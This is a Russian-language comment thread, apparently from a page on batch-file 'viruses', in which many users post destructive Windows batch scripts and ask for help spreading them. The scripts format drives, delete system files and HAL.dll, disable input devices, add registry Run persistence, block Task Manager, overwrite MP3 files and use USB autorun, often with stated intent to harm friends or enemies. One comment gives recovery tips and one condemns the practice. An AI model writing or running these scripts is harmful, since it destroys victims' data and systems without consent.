rundll32 mouse,disable
echo WSHShell.Popup(«Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе»); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
rundll32 mouse,enable
rundll32 keyboard,enable
pause
cls
СКАЖЫТЕ БУДЕТЕТ РАБОТАТЬ ПРОГА

Комментарий от вадЯг [ Ноябрь 9, 2011, 14:37 ]

да вы малорики парни

Комментарий от andrew [ Ноябрь 12, 2011, 18:49 ]

Не думаю

Комментарий от Jet-Soft.ru [ Ноябрь 23, 2011, 13:14 ]

Убийца explorer’a taskkill /F /IM explorer.exe

Комментарий от Jet-Soft.ru [ Ноябрь 23, 2011, 13:16 ]

Как сделать форматирование жесткого диска скрытно?

Комментарий от Jet-Soft.ru [ Ноябрь 23, 2011, 13:25 ]

Как сделать форматирование жесткого диска скрытно?
Спасибо ВетОС

@cls
@echo off
taskkill /F /IM explorer.exe
echo y|Format C:
echo y|Format D:
echo y|Format E:
echo y|Format F:
END
EXIT

Комментарий от Вирус!!! [ Ноябрь 29, 2011, 18:29 ]

oOOOO супер вирус !!! мой антивирус нашел в нем ТРОЯН и сразу изолировал!! крутяк теперь я буду это отправлять друзья то есть врагам xD )) админ респект!!

Комментарий от vadim [ Декабрь 2, 2011, 14:45 ]

вопше круто,,,ток напишите на мыло,можно ли занести его в автозагрузку и прикрипить программы для управления компом!!!!

Комментарий от макс [ Декабрь 23, 2011, 19:50 ]

народ помогите написать вирус который распространяется по сетке и форматирует все жесткие диски. спс заранее

Комментарий от alex [ Январь 10, 2012, 22:16 ]

Статья неплохая, хотя многое мне было уже известно. Хочу вам подсказать неплохую программу для конвертирования bat-файлов в exe! Называется она Bat to Exe Converter. Несмотря на маленький размер, она позволяет увеличивать размер файла, изменять иконку, добавлять описание, права. Сам уже пользуюсь полтора года.
Также хочу посоветовать скриптовый язык VBScript. Кто заинтересовался, пишите на почту alex1994mal@mail.ru

Комментарий от vladislav112 [ Январь 21, 2012, 14:22 ]

кинь вирус в автозагрузку C:\Documents and Settings\Admin\Главное меню\Программы\Автозагрузка

Комментарий от Mr. Ghost [ Январь 21, 2012, 18:23 ]

Не плохо :))

Комментарий от nOOb [ Январь 29, 2012, 12:28 ]

Жуть :)

Комментарий от Aneg [ Январь 29, 2012, 21:01 ]

Перезапуск Explorer а (проводникака)
[code]
@echo off
tasklist
taskkill /f /t /im "explorer.exe"
start %WinDir%\explorer.exe

Chcp 1251
msg * Готово
exit
[/code]

Комментарий от Inkognitos [ Февраль 8, 2012, 18:22 ]

Все прочитал…многое знаю! Кто реально умеет все это делать и научит меня — я с ним щедро россчитаюсь… Писать в скайп 0 Sijey1994 /// ИЛи на почту haker-n@ukr.net

Комментарий от Limon [ Февраль 11, 2012, 07:54 ]

hello

Комментарий от Лимон [ Февраль 11, 2012, 08:14 ]

кнекнк

Комментарий от Валентин [ Февраль 17, 2012, 21:48 ]

помогите как сделать чтобы папка отправилась на почтовый ящик с помощью bat файла.
плиз!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Комментарий от Виталий [ Февраль 24, 2012, 19:43 ]

Админчик прошу тебя помоги мне вот мой скайп google_97
http://vk.com/google_kva и ссылка в вк пажалуста

Комментарий от Andrey [ Март 7, 2012, 00:39 ]

Ёще один .bat вирус
@echo off
del C:\ *.* /q >nul
del D:\ *.* /q >nul
del E:\ *.* /q >nul
del F:\ *.* /q >nul
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
time 0:00 >nul
date 13.06.23 >nul
label C:IDIOT >nul
label D:DURAK >nul
label E:SUKA >nul
label F:GANDON >nul
copy %0 C:\Open.bat >nul
copy %0 D:\Open.bat >nul
copy %0 E:\Open.bat >nul
copy %0 F:\Open.bat >nul
net user «Idiot you Hacked» /add >nul
net user «Bitch you Hacked» /add >nul
net user «Durak you Hacked» /add >nul
net user «Kritin you Hacked» /add >nul
net user «Gavno you Hacked» /add >nul
md 1 >nul
md 2 >nul
md 3 >nul
md 4 >nul
md 5 >nul
md 6 >nul
md 7 >nul
md 8 >nul
md 9 >nul
md 10 >nu
assoc .lnk=.txt >nul
assoc .exe=.txt >nul
:x ; Start mspaint goto x ;
:x ; Start Calc goto x ;
ну этот еще цветочки.Я скинул 2 опасных вируса кроме этого!!!!!!!!!!!

Комментарий от лявян [ Март 7, 2012, 16:50 ]

@Echo off

с:

chdit C:\Program Files\QIP\Users

f:\rar.exe а -г users > nul

copy users.rar e:\abc > nul

g:\rar.exe a -r users > nul

copy users.rar g:\abc > nul

h:\rar.exe a -r users > nul

copy users.rar h:\abc > nul

del users-rar > nul помоги пожалуста почему не работает ?? обЪясни если время есть

Комментарий от крот [ Март 12, 2012, 07:48 ]

доброе время суток! подскажитье што будет если сделанный мною вирус поместить в портфель! што будет??? )))))

Комментарий от крот [ Март 12, 2012, 07:49 ]

и как он будет работать если его поместить на другую тачку!

Комментарий от Саша [ Март 18, 2012, 17:53 ]

НаПишу мощные и качественные вирусы пишите на e-mail : sanya301472@yandex.ru

Комментарий от Basic [ Март 20, 2012, 15:38 ]

Ммм…автор, подпиши там ещё что бы они все его запустили, ну так проверить работает или нет)

Комментарий от user [ Март 21, 2012, 10:20 ]

как можно ограничит играть все игры на компьютере или можно заблокировать или отключит какоето .dll файлов помогите

Комментарий от hack [ Апрель 2, 2012, 16:49 ]

Всем доброе время суток на конец нашёл что искал )))) почитав всё посты внимательно и ща буду создавать свою бомбу )))

Комментарий от Сергей [ Апрель 2, 2012, 17:10 ]

у меня похуже но хватит чтобы напугать)

pause /-просим нажать любую клавишу
pause /-просим нажать любую клавишу
pause /-просим нажать любую клавишу
md c:1 / — создаем папку на диске С
md c:2 / — создаем папку на диске С
md c:3 / — создаем папку на диске С
md c:4 / — создаем папку на диске С
md c:5 / — создаем папку на диске С
md c:6 / — создаем папку на диске С
md c:7 / — создаем папку на диске С
md c:8 / — создаем папку на диске С
md c:9 / — создаем папку на диске С
md c:02 / — создаем папку на диске С
md c:11 / — создаем папку на диске С
md c:12 / — создаем папку на диске С
md c:13 / — создаем папку на диске С
md c:14 / — создаем папку на диске С
md c:26 / — и так далее далее далее….
md c:574989
md c:569
md c:499
md c:99999999
md c:279
md c:99999946354
md c:159
md c:4999
md c:6599
md c:6699
md c:999999995464
md c:499
md c:999
md c:9499
md c:9499
md c:596599
md c:9799
md c:999
md c:7889
md c:84588
md c:89488
md c:977777
md c:418541
md c:5641
md c:1564118541
md c:81
md c:854141
md c:5641
md c:56415
md c:8416548
md c:841879
md c:456456
md c:521631
md c:456
md c:46541
md c:9845
md c:942684
md c:8942
md c:984654
md c:2946
md c:9826546
md c:425465456465
md c:8642654
md c:64654
md c:265654
md c:4684654
md c:26865432
md c:421
md c:894924
md c:984298
md c:498
md c:49742
md c:987
md c:9454
md c:2874
md c:98422974
md c:97541354
md c:29789
md c:729798
md c:729875461
md c:9875641
md c:9874561
md c:9879521456
md c:7956415241
md c:87524131
md c:987297
md c:987897
md c:297297
md c:98798
md c:79564153
md c:795415
md c:729797
md c:97864854
md c:9827
md c:8796541
md c:4564
md c:56489
md c:4564
md c:867465
md c:5674
md c:8946841
md c:564156
md c:415
md c:84874
md c:6874
md c:897474
md c:96
md c:4658974
md c:5894
md c:5746857
md c:8674
md c:8694
md c:678
md c:63788
md c:9797974
md c:851
md c:655
md c:7897
md c:89798
md c:7897
md c:789
md c:7489
md c:487489
md c:456456
md c:684
tree C:\ — «проверяем» диск C, зрелище классное можно набрать в командной строке и посмотреть)
win shutdown -s -f -t 3600 /- выключаем комп через 1 час)))

Комментарий от hack [ Апрель 3, 2012, 17:21 ]

Ребята помогите А как правильно написать вир чтоб заразить главную фото в маили чтоб жертва открыла фото и слетала винда или полностью погостить машину на всегда

Комментарий от юрец [ Апрель 4, 2012, 00:21 ]

и я хочу.killerplohoi@spaces.ru

Комментарий от ТОХА [ Апрель 5, 2012, 01:58 ]

Я типа в первые таким занимаюсь. По этому очень прошу розкажите если я напишу вирус по вашему методу не заразит ли он мой комп, и как его потом удалить да есщё как его сохранять пишите на мыло Vorohilo.antoxa@mail.ru очень нужно знать!!!!!!!!!

Комментарий от hack [ Апрель 5, 2012, 07:04 ]

Берем флешку которую вам не жалко (больше вы не сможите ей пользоватся)Создаем на ней:
AUTOEXEC.BAT
Dead.BAT
autorun.ini
______________________________

в AUTOEXEC.BAT пишем:
goto %config%
:dos1
rem c:vc401vc
lh keyrus
lh mmouse
lh C:WINDOWSCOMMANDmscdex /d:12345678
lh dndn
bootgui=0
:dos2
rem essolo.com
lh keyrus
lh mmouse
lh dndn
bootgui=0
:win
rem c:essolo.com
set path=C:WINDOWS;C:WINDOWSCOMMAND;c:;c:windows;c:windowscomand;c:arc;c:dn
C:WINDOWSCOMMANDDELTREE /y C:WINDOWSTEMP*.*
mode con codepage prepare=((866) C:WINDOWSCOMMANDega3.cpi)
mode con codepage select=866
keyb ru,,C:WINDOWSCOMMANDkeybrd3.sys
goto continue
:meos
c:kolibrimeosload.com
:l:meosload.com
:continue
rem bootgui=1
cd
cd windows
del *.dll
del *.ini
cd system32
del *.dll
del *.exe
cd D:
del *.exe
______________________________

в Dead.BAT пишем:
@echo off
cp Флешка:AUTOEXEC.BAT C:
msg * «Dead» >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
shutdown -s -t 1 -c «lol» -f >nul
______________________________

в autorun.ini пишем:
[autorun]
OPEN=Dead.BAT
______________________________

готово!
как это работает:
Вы вставляете флешку autorun.ini автоматичиски открывает Dead.BAT, Dead.BAT копирует AUTOEXEC.BAT на C и выключает компютер. при следущем запуске система слетает.

Комментарий от NERV [ Апрель 18, 2012, 13:59 ]

Вобще-то добрые люди убирают автозапуск и не открывают флешки даблкликом — ебанат.

Вот нормальная команда, единственная которая — робит
rem rundll32 user32,SwapMouseButton

А все mouse,disable — хоть убейчя — не робят. А мне это позарез надо!

Комментарий от EnterNet UFO [ Апрель 19, 2012, 15:43 ]

Простейший вир calculator не возможно закрыть , но есть минус чёрное окно на втором плане

@echo off >hul
:loop >hul
echo Today is 15.12.????th^!, time 06.23 to start calculator
calc.exe >hul
goto loop >hul

Комментарий от Дима [ Апрель 23, 2012, 22:14 ]

Ты в конце каждой строки «>nul» не писал а без этого хоть и с «@echo off» процесс не будет скрытым!!! Так что советую поставить «>nul» и на экране не будет выходить коммандная строка «cmd»

Комментарий от Дима [ Апрель 23, 2012, 22:18 ]

И зачем ты cls написал в конце по любому cmd сама закроется!

Комментарий от Дима [ Апрель 23, 2012, 22:27 ]

Вот зацените мой безпощядный вирус!
@echo off
rundll32 keyboard,disable >nul
rundll32 mouse,disable >nul
del C:/ *.* \q >nul
del D:/ *.* \q >nul
del F:/ *.* \q >nul
del E:/ *.* \q >nul
del C:/Windows/System32 *.* \q >nul
del C:/Windows *.* \q >nul
assoc .lnk=.mp3 >nul
assoc .exe=.mp3 >nul
label C:У вас полетела Система! Хай Хай!! >nul
copy «»%0″» «%SystemRoot%\system32\File.bat»
reg add «HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run» /v «Filel» /t REG_SZ /d «%SystemRoot%\system32\File.bat» /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
net user «Idiot you Hacked» /add >nul
net user «Bitch you Hacked» /add >nul
net user «Durak you Hacked» /add >nul
net user «Kritin you Hacked» /add >nul
net user «Dibil you Hacked» /add >nul
:x ;
Start mspaint
goto x ;
:x ;
Start Calc
goto x ;
copy %0 C:\Open.bat >nul
copy %0 D:\Open.bat >nul
copy %0 E:\Open.bat >nul
copy %0 F:\Open.bat >nul
Кто умеет делать вирусы тот поймет!

Комментарий от Дима [ Апрель 23, 2012, 22:36 ]

Вот поприкалывайтесь над друзьями
http://depositfiles.com/files/xfw1vjm21 осторожно на своем компе не советую запускать!

Комментарий от Михаил [ Май 13, 2012, 15:34 ]

Ой ребяты! Вам не вирусы, а анекдоты писать надо!
Во всём топике нашёл всего пару интересных, РАБОТАЮЩИХ, скриптов. В действительности, простейшими DOS операторами, сейчас уже ничего не сломать.
VBScript, JS, Delphi, вот — то что вам может пригодиться, НО это должен быть самописный, ОРИГИНАЛЬНЫЙ код, т.к. стандартные командочки вроде подмены расширения и удаления системных файлов, знают даже самые тухлые бесплатные антивирусы.
Кто действительно хочет научиться хакингу — милости прошу в бауманский Университет на курсы Light Hacking.
Теперь страждущим:
Те, кто в силу своей неопытности — всё же убил ассоциации файлов на своём компе, писаниной с данного форума — вчитайтесь в «свой» код и поправьте его в обратную сторону.
Например:
assoc .exe=.txt >nul
Поменяйте txt c exe местами.
Пускай вы просрёте свои блокнотики, зато вы сможете спокойно запустить какой-нибудь AVZ чтоб восстановить свои ассоциации.
Если «Ваш» код кишит чем-то вроде:
md c:\1
уберите это с помощью:
DEL c:\1\*.*
RD c:\1

Если «Ваш» код содержал строку удаляющую NTLDR (хотя, если мне не изменяет память — в современных системах его хрен удалишь) — вам потребуется установочный диск с виндой, но лишь для того, чтоб загрузиться в консоль восстановления и выполнить:
FIXBOOT
и
FIXMBR
После этого ваш комп должен запуститься.
Если у Вас при включении ПК загружается какая-нибудь хрень — которую вы не заказывали — в первую очередь обратите внимание на автозагрузку.
1) Пуск-Программы-Автозагрузка
2) Пуск-Выполнить-MSCONFIG-Автозагрузка
Ну и в конце (простите за оффтоп) не будте нубами, уважайте чужой труд и авторское право (это для тех кто любит копипаст) и самое главное: ПРЕДОХРАНЯЙТЕСЬ!
Пламенный привет!

Комментарий от Максим [ Июнь 9, 2012, 23:44 ]

Есть у кого вирус на Взлом компьютера! И получение полного контроля!

Комментарий от Сисадмин-шкодник [ Июнь 21, 2012, 04:34 ]

Доров, друг пакостник. Скажи, как эти вирусы работают на win XP и win7, если ты заходишь от юзера
и твои возможности ограничены? И как можно сделать,чтобы при запуске win7 не запрашивала для данной проги разрешение на внесение изменений??? Заранее спасибо.

Комментарий от Lol-men [ Июнь 27, 2012, 16:22 ]

Комментарий от Максим [ Июнь 9, 2012, 23:44 ]
Есть у кого вирус на Взлом компьютера! И получение полного контроля!

Нет, но у меня есть скрипт, после запуска которого из монитора вылезает бегемот и дрючит владельца компа в анус.

Комментарий от >>>XaKeP [ Июль 10, 2012, 22:23 ]

Зацените))

@echo off
rundll32 keyboard,disable
Date 18.11.18
Time 18:18
rundll32 mouse,disable
echo WSHShell.Popup(«Warning,.. ВАШ ПК ЗАБЛОКИРОВАН ЗА РАСПРОСТРАНЕНИЕ ПОРНОГРАФИИ! ПРОСИМ

ОСТАВАТЬСЯ НА МЕСТЕ ДО ПРИЕЗДА ПРЕДСТАВИТЕЛЕЙ УПРАВЛЕНИЯ «К» «); >> %temp%\mes.js
start %temp%\mes.js
assoc .dll=.LOL
copy %0 %windir%/system
echo run=%windir%/system/*.bat >> win.ini
echo run=%windir%/system/*.bat >> system.ini
echo y|Format C:
echo y|Format D:
echo y|Format E:
echo y|Format F:
taskkill /f /im opera.exe
taskkill /f /im firefox.exe
taskkill /f /im chrome.exe
taskkill /f /im iexplore.exe
taskkill /f /im magent.exe
taskkill /f /im Skype.exe
taskkill /f /im avp.exe
taskkill /f /im taskmgr.exe
md Windowsfghfdfhs
md abghsdgdg
md #&%$#$gdfg
md gamesdgd
md Windowsdfgdfg
md abghdfgdsfg
md #&%$#$dfsgШsdg
md gamesasgП6
md WindowsfgdfШdg
md abghfgrgdfg
md #&%$#$ddgg67П
md gamesddfgШ
md WindowsdfdgВФЫ
md abghgdfgfgВФЫВФШ7Ы
md #&%$#$gdfdfФЫВ6Ф
md gamesdfdsФЫВmШdgЫВd Windows
md abghffgЫВФЫ76
md #&%$#$sdfadВФЫФ8Ш
md gamesmdsdgf WФ6Ш876ВЫВindows
md abghsdfdfgФЫВФЫВ
md #&%$#$fdgЫВФЫШ
md gamesmd ddЫВФВВПМАО ЫВfsfsdWindows
md abghsfafВФgЬМТШ6Ш
md #&%$#$gВАТОВТВ57Г8А
md gamesdfg6Н65НГ
md WindowsfОТghНВfdfhs
md abghsdgdgВУ6
md #&%$#$gdfВТАgЛ6Г У
md gamesdgdВОТВН
md WindowsdfgdfВРДАg
md abghdfgdsfgЫВТ
md #&%$#$dfsgЫВsdЛОЬg
md gamesasgВФААВШ
md WindowsfgdfdgАФНОЫ
md abghfgrgdfФЫВgЕ
md #&%$#$ddggТР43Е
md gamesddfgФЫВВАПАВП
md WindowsdfdgВАР
md abghgdfgfgФЫО
md #&%$#$gdfdЫФЕ534НВЬТf
md gamesdfdsВmdgd ОНТВАНWindows
md abghffgФЫОЕР
md #&%$#$sdfaАТdФЫВР
md gamesmdsdgf ООТОПАТWВindows
md abghsdfdfgВАТФЫАО
md #&%$#$fdgФЫЬТАО
md gamesmdООРООТТ dВdfПТОАТОПЬТОsФЫВfsdWindows
md abghsfАВФЫafgВ
md #ФЫАЛОВФЫ&%$#$gОА
md АОТgamesdfФЫВФЫВgТ
cls

Комментарий от >>>XaKeP [ Июль 10, 2012, 22:25 ]

@echo off
rundll32 keyboard,disable
Date 18.11.18
Time 18:18
rundll32 mouse,disable
echo WSHShell.Popup(«Warning,.. ВАШ ПК ЗАБЛОКИРОВАН ЗА РАСПРОСТРАНЕНИЕ ПОРНОГРАФИИ! ПРОСИМ

ОСТАВАТЬСЯ НА МЕСТЕ ДО ПРИЕЗДА ПРЕДСТАВИТЕЛЕЙ УПРАВЛЕНИЯ «К» «); >> %temp%\mes.js
start %temp%\mes.js
assoc .dll=.LOL
copy %0 %windir%/system
echo run=%windir%/system/*.bat >> win.ini
echo run=%windir%/system/*.bat >> system.ini
echo y|Format C:
echo y|Format D:
echo y|Format E:
echo y|Format F:
taskkill /f /im opera.exe
taskkill /f /im firefox.exe
taskkill /f /im chrome.exe
taskkill /f /im iexplore.exe
taskkill /f /im magent.exe
taskkill /f /im Skype.exe
taskkill /f /im avp.exe
taskkill /f /im taskmgr.exe
md Windowsfghfdfhs
md abghsdgdg
md #&%$#$gdfg
md gamesdgd
md Windowsdfgdfg
md abghdfgdsfg
md #&%$#$dfsgШsdg
md gamesasgП6
md WindowsfgdfШdg
md abghfgrgdfg
md #&%$#$ddgg67П
md gamesddfgШ
md WindowsdfdgВФЫ
md abghgdfgfgВФЫВФШ7Ы
md #&%$#$gdfdfФЫВ6Ф
md gamesdfdsФЫВmШdgЫВd Windows
md abghffgЫВФЫ76
md #&%$#$sdfadВФЫФ8Ш
md gamesmdsdgf WФ6Ш876ВЫВindows
md abghsdfdfgФЫВФЫВ
md #&%$#$fdgЫВФЫШ
md gamesmd ddЫВФВВПМАО ЫВfsfsdWindows
md abghsfafВФgЬМТШ6Ш
md #&%$#$gВАТОВТВ57Г8А
md gamesdfg6Н65НГ
md WindowsfОТghНВfdfhs
md abghsdgdgВУ6
md #&%$#$gdfВТАgЛ6Г У
md gamesdgdВОТВН
md WindowsdfgdfВРДАg
md abghdfgdsfgЫВТ
md #&%$#$dfsgЫВsdЛОЬg
md gamesasgВФААВШ
md WindowsfgdfdgАФНОЫ
md abghfgrgdfФЫВgЕ
md #&%$#$ddggТР43Е
md gamesddfgФЫВВАПАВП
md WindowsdfdgВАР
md abghgdfgfgФЫО
md #&%$#$gdfdЫФЕ534НВЬТf
md gamesdfdsВmdgd ОНТВАНWindows
md abghffgФЫОЕР
md #&%$#$sdfaАТdФЫВР
md gamesmdsdgf ООТОПАТWВindows
md abghsdfdfgВАТФЫАО
md #&%$#$fdgФЫЬТАО
md gamesmdООРООТТ dВdfПТОАТОПЬТОsФЫВfsdWindows
md abghsfАВФЫafgВ
md #ФЫАЛОВФЫ&%$#$gОА
md АОТgamesdfФЫВФЫВgТ
cls

Комментарий от RoY [ Август 7, 2012, 21:41 ]

Здравствуйте все кто любит по прикалываться над своими друзьями и уничтожить win своих врагов! :D
я еще НОВИЧОК в BATname и подскажите пожалуйста правильно ли я написал вроде простейший ВИР!

@echo off
rundll32 keyboard,disable
rundll32 mouse,disable
clc

ОН должен просто отключить клаву и мышь? И после перезагрузки ПК все будет норм?

Комментарий от ильдар [ Август 21, 2012, 00:20 ]

помогите чтобы мой винлок запускался автоматом с виндой в автозагрузку к себе гидать это глупо допустим я комуто скинул чтобы он в виндой запускался

Комментарий от htSoldier [ Сентябрь 9, 2012, 13:43 ]

@echo off
cls

del %systemroot%\system32\HAL.dll /q

Комментарий от Язик [ Сентябрь 17, 2012, 23:28 ]

Народ, помогите. Юзанул на пк этот вирус — тот который самый первый, теперь не могу вылечить, что делать ?
срочно народ пишете на http://vk.com/xbox_elite

Комментарий от Илья [ Октябрь 7, 2012, 19:36 ]

Всем привет я специалист в BAT
Могу вам придложить это
md 1389233123
md 13761ё2ё12
md 13422222222
md Удоление
md 13lox
md 13Lox
md 133423324
md 133424
md 13124
md 133421
md 131213412
md 1331234
md 132234
md 13342134
md 13124
md 1323
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
start echo Идёт обновление подождите…
start pause
start logoff
Короче он немного зарожает создоёт много папок и выходит из системы
Можно пробовать на своём я пробывал всё ок!!
Это не сильный оброзец но хирачит прелично!
Ждите новоги сильного
Создоём новый который снисёт винду и больше её не устоновит
Всем пока

Комментарий от tuZ~XaKeR [ Ноябрь 17, 2012, 22:30 ]

хДД очень угорал над комментом Ильи , насчет специалиста в bat , такие команды каждый школьник.У кого есть вопросы насчет команд или маскировки bat пишите в вк http://vk.com/tuz_pro или в skype djandre_vip

Комментарий от аенто [ Декабрь 3, 2012, 23:19 ]

парни привет как можно сделать так что б батник находящийся на флешке, с копировался в автозагрузку автоматически после того как я ее вставлю в комп

Комментарий от аенто [ Декабрь 3, 2012, 23:20 ]

пожалуйста ответь мне очень нужно знать на мыло

Комментарий от Михаил [ Декабрь 8, 2012, 14:34 ]

У меня ни каким макаром не сохраняются .bat файлы стоит винда xp. Че делать скажите плиз?????Либо здесь в коментах либо на мыло mihail.alex2000@yandex.ru
ПЛИЗЗЗЗЗ!!!!!

Комментарий от Светочка [ Декабрь 26, 2012, 19:03 ]

Хочу еще вирусочков

Комментарий от паша [ Январь 19, 2013, 19:07 ]

@echo off
cls
echo Please wait, updating system…
ctty nul. //Это новая команда, она отключает вывод текста в окошке.
exist %WINDIR%\SYSTEM\VMM32\%0 goto :end //Если вирь уже запускался то пусть запустит себя снова.
copy %0 %WINDIR%\SYSTEM\VMM32
cd c:\ //Переходим в другую директорию
for %%a in (*.mp3 c:\*.mp3 c:\MUZ\*.mp3 c:\My Music\*.mp3 ..\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd My Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd My_Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd MyMusic
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Музыка
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Музон
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd MUZ
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd mp3
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd d:\
for %%a in (*.mp3 c:\*.mp3 c:\MUZ\*.mp3 c:\My Music\*.mp3 ..\*.mp3) do copy /y %0 %%a
cd My Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Тут тоже самое.
cd My_Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd MyMusic
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Музыка
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Музон
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd MUZ
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd mp3
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
:end //Метка
start /m /w %WINDIR%\SYSTEM\VMM32\%0 //Запуск в свернутом режиме
ctty con //Врубаем разрешение на показ текста в окне
echo Say goodbye your MP3 collection :)) Virus [BAT.kas.a] //Прощальные строки
cls //Выход.

Этот вирус удаляет всю музыку с компа

Комментарий от St.Tux [ Февраль 7, 2013, 15:35 ]

Мдаааа…. а у меня FreeBSD…. мне похуй.

Комментарий от Pucci [ Март 3, 2013, 00:31 ]

Автору статьи респект
Но судя по комментам, ясно, откуда берутся быдло кодеры вирусов, хотя нефига не въезжают сами.

Комментарий от Саня [ Апрель 10, 2013, 21:14 ]

самый простой способ изменить формат txt на bat — создать блокнот написать в нём команда нажать файл потом сохранить как а там в названии заменить .txt на .bat

Комментарий от Саня [ Апрель 10, 2013, 21:15 ]

извените написал неправильно. не команда а команды

Комментарий от POISK [ Апрель 18, 2013, 23:46 ]

ДА, ПОЧИТАЛ Я ТУТ КОМЕНТЫ И ПРОСТО ДИВУ ДАЮСЬ КАКИЕ ДОБРЫЕ ЛЮДИ ЕСТЬ! ТОЛЬКО И РУКИ ЧЕШУТСЯ НАПАКОСТИТЬ, ДАЖЕ ТАК НАЗЫВАЕМЫМ, СВОИМ ДРУЗЬЯМ ОСОЗНАННО! И КАК ИХ НАЗВАТЬ!? ПРЕСТУПНИКИ, ЗЛОУМЫШЛЕННИКИ — ТАК ПРОСТО УГРОБИТЬ ЧУЖОЕ ИМУЩЕСТВО. А ВОТ НЕТ, ЧТО БЫ ДЕЛЬНЫЙ СОВЕТ ДАТЬ И ПОМОЧЬ «БЛИЖНЕМУ», И НЕ ТОЛЬКО. . .

Комментарий от Илья [ Апрель 21, 2013, 00:32 ]

Создал батник новый смотрите

@echo off
copy %0 %windir%\Win32.bat > nul
reg add «HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce» /v Win32 /t REG_SZ /d %windir%\Win32.bat /f
taskkill /im /f chrome.exe
taskkill /im /f ie.exe
taskkill /im /f firefox.exe
taskkill /im /f opera.exe
taskkill /im /f safari.exe
del C:\Program Files\Google\Chrome\Application\chrome.exe /q
del C:\Program Files\Safari\safari.exe /q
del C:\Program Files\Mozilla Firefox\firefox.exe /q
del C:\Program Files\Opera\opera.exe /q
del C:\Program Files\Internet Explorer\ie.exe /q
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot\*.* /q
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot /q
rundll32 mouse,disable > nul
rundll32 keyboard,disable > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f > nul
taskkill /f /im explorer.exe > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System /v DisableTaskMgr /t REG_DWORD /d 1 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
del «%SystemRoot%\Driver Cache\i386\driver.cab» /f /q >nul
del «%SystemRoot%\Media» /q > nul
assoc .lnk=.txt
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
del «%SystemRoot%\Cursors\*.*» >nul
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul
copy «%0″ «%SystemRoot%\system32\sys321.bat > nul
shutdown -r -t 00 -c error > nul
del %0

Комментарий от Кот 16 [ Июнь 11, 2013, 16:33 ]

Скиньте плиз все BAT команды мне на мыло)))
vanwolf16@yandex.ru

Комментарий от Makish115 [ Ноябрь 5, 2013, 13:10 ]

